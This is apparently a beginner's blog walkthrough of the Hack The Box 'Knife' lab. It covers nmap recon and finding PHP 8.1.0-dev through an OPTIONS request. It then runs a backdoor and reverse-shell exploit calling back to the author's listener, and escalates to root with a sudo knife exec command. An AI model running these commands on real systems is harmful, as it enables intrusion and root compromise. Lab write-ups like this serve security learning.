HTB —Knife
Abstract
- Assessing HTTP requests
- Exploit php 8.1.0-dev to get backdoor and reverse shell
- Exploit knife to issue OS command as root
Introduction
Hi people! In this post, I will be talking about my first ever “not-cheating” machine takeover including the “cheating” and the “not-cheating” one (haha, yikes).
This machine is rated as easy, however, it teaches me a lot as a beginner and I am looking forward to trying the other machine takeovers.
Reconnaissance/Information gathering
First of all, we need to perform a Nmap scan. I use the following script
nmap -A -v 10.10.10.242Legends:
A : a lot of scans (version detection, OS detection, script scan) pretty much almost basic things you need.
v : verbose, display more deeper reports.
From the Nmap scan, we can see that 2 ports are open 22 and 80.
To be very honest, there is no somewhat valuable information to work with, so let’s just access it. Port 22 which is SSH, needs a user name and password, we do not have that (assuming brute force is not an option). Port 80 which is a web application, we can try to access that.
As usual, I try to dig down to the source code, find any meaningful JS and possible HTML comments and got nothing (this usually takes some time). Since we do not find anything interesting, we back to our first recon, maybe we can find something interesting.
Something is interesting in port 80, HTTP methods. There is 1 method, OPTIONS that I want to try since it is not common for me. You can read more about OPTIONS method here.
Since this is related to HTTP methods, I try to curl it.
curl -X OPTIONS http://10.10.10.242 -i
Capital X for http method.
It returns the source code of the page along with its response header.
There is interesting information for X-Powered-By.
PHP/8.1.0-dev
Now let’s try to research.
From google search results, we can figure out that PHP 8.1.0-dev is vulnerable to remote code execution (RCE). It is also good practice to look at searchsploit. However, in this case, Google’s result is more reliable and clear.
After a while of searching and digging, I finally find the right tools. You can download it here.
Execution
I start with reading the readme document.
From this documentation and my humble understanding, 2 scripts should be executed. the Backdoor file is required to upload the backdoor and the revshell is to create the reverse shell to enable us communicating with the compromised server.
Some commands that I try:
1. whoami --> james
2. ls home/james (because the flag is usually here) --> user.txt
3. cat home/james/user.txt --> [user flag]
4. sudo -l (to know any sudo commands available for james) -->
Matching Defaults entries for james on knife:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
We know, that the knife command is available to be called as root without password.
Knife
So to, I read some articles about privilege escalation and most of them almost say the same thing that we need to find commands that can be executed as root or process that has been running as root and has vulnerabilities that provide privilege escalation. In this case, knife command can be run as root. I try to research what knife command can do especially something around executing OS command.
Knife can execute OS command by issuing
sudo knife exec -E 'system("input your OS command")'
However, I find an error when executing it in the previous shell (through backdoor exploit), so I try the second file, the reverse shell. In order to utilise the reverse shell, we need to prefer 3 things.
- Host/Target/Victim IP: We have that.
- Our IP address: Can be obtained from ifconfig -a.
- Our receiving/listening port: Can be opened by nc -nvlp your_port (nc -nvlp 4444). It will keep listening and waiting for connection.
Then we can execute the exploit
python3 revshell_php_8.1.0-dev.py http://10.10.10.242 10.10.16.5 4444Note: Please note that u need to use 2 terminal. One for executing the exploit ("first terminal") and 1 for listening and interacting with the incoming connection ("second terminal").
After executing the exploit, see the second terminal, we can interact with the system, similar to the previous one. Then, we can execute our exploit.
sudo knife exec -E 'system("cat /root/root.txt")'
And then we get the root flag.
Notes
I do not have to perform the OPTIONS curl since it can be obtained in the browser.
I do not actually know the difference between the python exploits so it might be an incorrect explanation (sorry), however, I'm pretty sure it works.